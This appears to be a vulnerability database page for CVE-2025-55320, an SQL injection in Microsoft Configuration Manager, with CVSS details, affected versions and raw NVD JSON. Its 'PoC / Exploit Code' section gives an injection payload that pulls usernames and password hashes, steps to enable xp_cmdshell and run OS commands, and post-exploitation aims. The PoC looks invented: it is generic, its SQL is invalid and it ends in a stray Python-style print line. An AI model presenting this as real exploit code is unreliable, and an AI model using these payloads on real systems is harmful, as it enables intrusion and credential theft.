Security Vulnerability Report
CVE-2025-55320 CVSS 6.8 MEDIUM

CVE-2025-55320

Published: 2025-10-14 17:15:45
Last Modified: 2025-10-17 17:15:39

Description

Improper neutralization of special elements used in an SQL command ('SQL injection') in Microsoft Configuration Manager allows an authorized attacker to elevate privileges over an adjacent network.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:configuration_manager_2403:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:configuration_manager_2409:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:configuration_manager_2503:*:*:*:*:*:*:*:* - VULNERABLE
Microsoft Configuration Manager (all supported versions; refer to Microsoft's official advisory to confirm the specific affected version range)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
sql
-- CVE-2025-55320 PoC: SQL Injection in Microsoft Configuration Manager
-- This PoC demonstrates the concept of SQL injection via the CM management interface
-- Note: Actual exploitation requires valid high-privilege credentials and adjacent network access
-- Step 1: Identify injectable parameter
-- The vulnerability exists in input handling within Configuration Manager's
-- administrative console or API endpoints that interact with the site database.
-- Step 2: Craft malicious payload
-- Example of a malicious input that could be injected into a vulnerable parameter:
DECLARE @malicious_input NVARCHAR(MAX);
SET @malicious_input = '''; UNION SELECT username, password_hash, 1 FROM v_R_User --';
-- Step 3: The vulnerable code might construct a query like:
-- EXEC sp_executesql N'SELECT * FROM v_R_System WHERE Name = ''' + @user_input + ''''
-- After injection, the query becomes:
-- SELECT * FROM v_R_System WHERE Name = ''; UNION SELECT username, password_hash, 1 FROM v_R_User --'
-- Step 4: Privilege escalation via SQL Server extended procedures
-- After gaining database access, attempt to execute OS commands:
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- EXEC xp_cmdshell 'whoami';
-- Step 5: Post-exploitation
-- Use obtained SYSTEM-level access to:
-- - Extract CM site secrets
-- - Push malicious software deployment policies
-- - Compromise managed endpoints across the enterprise
print('CVE-2025-55320 conceptual PoC - requires authenticated access to CM environment')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55320", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:45.130", "lastModified": "2025-10-17T17:15:38.893", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Configuration Manager allows an authorized attacker to elevate privileges over an adjacent network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2403:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9128.1035", "matchCriteriaId": "9CEB0E6F-E984-4382-9C88-C506615D9868"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2409:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9132.1029", "matchCriteriaId": "E3B2EC65-EAFA-4938-AAA4-EC49C6A854BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2503:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9135.1008", "matchCriteriaId": "EB0C2F23-3D0B-4683-8956-9DF40D440F2F"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55320", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}